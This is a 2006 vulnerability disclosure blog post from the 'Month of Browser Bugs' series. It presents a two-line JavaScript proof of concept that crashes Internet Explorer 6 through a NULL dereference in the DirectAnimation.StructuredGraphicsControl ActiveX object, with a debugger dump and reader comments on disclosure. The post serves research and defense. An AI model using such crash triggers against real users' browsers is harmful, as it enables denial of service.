Wednesday, July 05, 2006

MoBB #6: StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

Demonstration

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference

posted by hdm @ 9:05 PM   11 comments links to this post

11 Comments:

At 5:46 AM, Anonymous Juano said...

No crash in Opera 9.0 Linux

 
At 6:47 AM, Anonymous web design uk said...

Nice catch! Works

 
At 8:21 AM, Anonymous Kyle said...

Have you tested any of these in IE7? I can't get most of them to do anything (so maybe Microsoft has taken care of them for their next version).

 
At 8:28 AM, Anonymous Anonymous said...

Any NEW exploits or are you just copying and pasting information you found on other sites?

 
At 8:32 AM, Blogger hdm said...

This is a new exploit, the web site reference was provided for background information on what this control is supposed to do (ie. not crash).

 
At 8:37 AM, Anonymous Anonymous said...

Already fixed on IE 7

 
At 10:24 AM, Anonymous Anonymous said...

When did you report this to Microsoft?
Do you think that they will release a patch next Tuesday, as per their monthly schedule?

 
At 10:30 AM, Blogger hdm said...

This was reported on March 6th as well.

 
At 4:36 PM, Blogger rich_addr said...

Why did you choose to release this bug now. Are you discouraged that MS hasn't fixed it yet, even though you reported it in March?

 
At 4:43 PM, Blogger hdm said...

This is a strange (but common) type of flaw that affects a wide range of ActiveX objects. It was selected for inclusion based on the risk level (low) and simplicity.

 
At 5:49 PM, Anonymous Anonymous said...

Doesn't crash IE7 or IE6. IE6 is most likely unaffected because I do not have the relevant ActiveX control on my system.

 

Post a Comment

Links to this post:

Create a Link

<< Home